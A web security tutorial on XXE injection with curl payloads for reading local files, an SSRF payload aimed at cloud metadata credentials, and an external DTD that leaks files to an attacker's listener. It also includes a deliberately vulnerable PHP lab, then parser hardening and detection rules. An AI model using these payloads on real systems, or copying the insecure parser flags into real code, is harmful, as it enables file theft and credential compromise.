XXE Attacks: Exploiting XML External Entities for File Disclosure and Blind OOB Exfiltration

Web Exploitation
Time it takes to read this article 5 minutes.

Disclaimer: This article is for education and authorized testing only. Run these techniques exclusively against systems you own or have explicit written permission to test. Unauthorized testing is illegal in most jurisdictions.

Introduction

XML External Entity (XXE) injection remains one of the most impactful server-side flaws in the OWASP catalogue. When an application parses attacker-controlled XML with a misconfigured parser, an attacker can read local files, perform SSRF, reach internal services, and in well-configured environments still exfiltrate data through out-of-band (OOB) channels.

In this post you'll learn how XXE actually works at the parser level, how to confirm and exploit a classic file-disclosure XXE, and how to escalate to blind XXE with an external DTD and OOB exfiltration. We'll close with a Blue Team section that carries equal weight: how to detect and shut these attacks down.

How It Works

XML supports a feature called entities — placeholders that the parser expands at parse time. They are declared in a Document Type Definition (DTD), introduced with the <!DOCTYPE ...> declaration.

A normal internal entity simply substitutes a string:

<!DOCTYPE foo [ <!ENTITY name "yunolay"> ]>
<data>&name;</data>
XML

An external entity tells the parser to fetch content from a URI — and this is where the danger lies. The SYSTEM keyword accepts file://, http://, ftp://, and (depending on the parser/PHP wrappers) other schemes:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>
XML

If the application reflects the parsed value back to the user, the contents of /etc/passwd appear in the response. The root cause is parsers that resolve external entities by default — historically Java's DocumentBuilderFactory, PHP's libxml (pre-2.9.0 default), .NET's XmlDocument, and many others.

When the response does not echo the entity, the attack becomes blind. We then chain a parameter entity with an external DTD to force the parser to make an outbound request carrying the stolen data — the OOB technique.

Prerequisites / Lab Setup

You need a vulnerable endpoint that accepts XML. The simplest local target is a small PHP service with the legacy resolver enabled:

<?php
// index.php — DELIBERATELY VULNERABLE, lab only
libxml_disable_entity_loader(false); // re-enables external entities
$xml = file_get_contents('php://input');
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_DTDLOAD);
echo "Hello, " . $doc->name;
PHP

Run it and an attacker-controlled "collaborator" listener:

# Terminal 1 — vulnerable app
php -S 127.0.0.1:8080

# Terminal 2 — OOB / exfil listener (also serves the malicious DTD)
python3 -m http.server 8000
Bash

For real engagements, Burp Suite Collaborator provides a unique DNS/HTTP catcher; the local http.server above is a stand-in.

Attack Walkthrough

1. Confirm XML parsing

Send a benign internal entity and check it expands:

curl -s http://127.0.0.1:8080/ \
  --data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY t "PROOF"> ]>
<root><name>&t;</name></root>'
# Response: "Hello, PROOF"  -> entities are processed
Bash

2. Classic file disclosure (in-band)

curl -s http://127.0.0.1:8080/ \
  --data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><name>&xxe;</name></root>'
Bash

The response now contains /etc/passwd. On PHP targets, the php://filter wrapper base64-encodes files that would otherwise break the XML parser (e.g. source code containing <):

curl -s http://127.0.0.1:8080/ \
  --data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM
  "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<root><name>&xxe;</name></root>'
Bash

Pipe the result to base64 -d to recover the source.

3. XXE to SSRF

Swap the file:// URI for an internal HTTP target to reach metadata services or internal apps:

<!DOCTYPE r [ <!ENTITY xxe SYSTEM
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]>
<root><name>&xxe;</name></root>
XML

This is a common pivot into cloud credential theft — see also SSRF to cloud metadata.

4. Blind XXE with OOB exfiltration

When nothing is reflected, host an external DTD on your listener. Save this as evil.dtd served by the http.server:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://127.0.0.1:8000/?d=%file;'>">
%eval;
%exfil;
XML

Then submit a payload that pulls and triggers the external DTD via parameter entities (%):

curl -s http://127.0.0.1:8080/ \
  --data-binary '<?xml version="1.0"?>
<!DOCTYPE r [
  <!ENTITY % remote SYSTEM "http://127.0.0.1:8000/evil.dtd">
  %remote;
]>
<root><name>test</name></root>'
Bash

The parser fetches evil.dtd, reads the target file into %file, builds an entity whose URI embeds that data, and resolves it — sending a request to your listener:

127.0.0.1 - - "GET /?d=cm9vdDp4OjA6MDpyb290Oi9yb290... HTTP/1.0" 200
Plaintext

Base64-decode the d parameter to recover the file. This works even when the parser blocks general external entities inside the internal subset, because parameter entities in an external DTD are processed separately. For files containing newlines, an FTP-based exfil DTD (using a tool like xxeftp / XXEinjector) avoids HTTP query-string truncation.

Attack Flow Diagram

XXE Attacks: Exploiting XML External Entities for File Disclosure and Blind OOB Exfiltration diagram 1

The diagram shows the blind OOB chain: the app fetches the attacker's DTD, reads a local file, then leaks it back over an outbound request the attacker captures.

Detection & Defense (Blue Team)

XXE is fully preventable at the parser layer. Defense should be applied with the same rigor as any offensive testing.

1. Disable DTDs and external entities (primary control). This is the definitive fix.

// Java — DocumentBuilderFactory hardening
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
Java
// .NET — safe XmlReader settings
var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null
};
C#
// PHP >= 8.0: external entities are off by default.
// libxml_disable_entity_loader() is deprecated/removed; never re-enable.
// Avoid LIBXML_NOENT and LIBXML_DTDLOAD on untrusted input.
$doc = simplexml_load_string($xml); // no dangerous flags
PHP

2. Egress filtering. Block the application's outbound DNS/HTTP to arbitrary destinations. OOB and SSRF-based XXE both depend on the server making requests it never normally should. Deny-by-default egress neutralizes blind exfiltration.

3. WAF and input validation. Reject requests whose body contains <!DOCTYPE or <!ENTITY when your API does not legitimately need a DTD. This is a defense-in-depth signal, not a primary control.

4. Detection rules. Hunt for these in WAF/proxy logs:

# Surface likely XXE attempts in access/body logs
grep -aiE '<!DOCTYPE|<!ENTITY|SYSTEM "file:|php://filter|169\.254\.169\.254' access.log
Bash

Alert on application servers initiating outbound connections to unexpected hosts, requests to 169.254.169.254, and file:// access patterns in parser error logs. Map this to MITRE ATT&CK T1190 (Exploit Public-Facing Application) and the SSRF pivot to T1552.005 (Cloud Instance Metadata API).

5. Keep libraries patched. Track CVEs in your XML stack — e.g. CVE-2018-1000840 (Apache Spark XXE) and the recurring XXE issues in office-document and SOAP parsers. Many frameworks now ship secure-by-default, but legacy services lag.

For broader server-side exploitation context, see Server-Side Template Injection.

Conclusion

XXE turns a routine XML endpoint into a file-read, SSRF, and data-exfiltration primitive. The classic in-band variant is easy to confirm and exploit; the blind OOB variant — using parameter entities and an external DTD — defeats applications that simply stop reflecting output. The good news for defenders is that a single, well-understood configuration (disable DTDs and external entities) eliminates the entire class. Combine that with strict egress controls and log-based detection, and XXE moves from "critical finding" to "non-issue."

References

Comments

Copied title and URL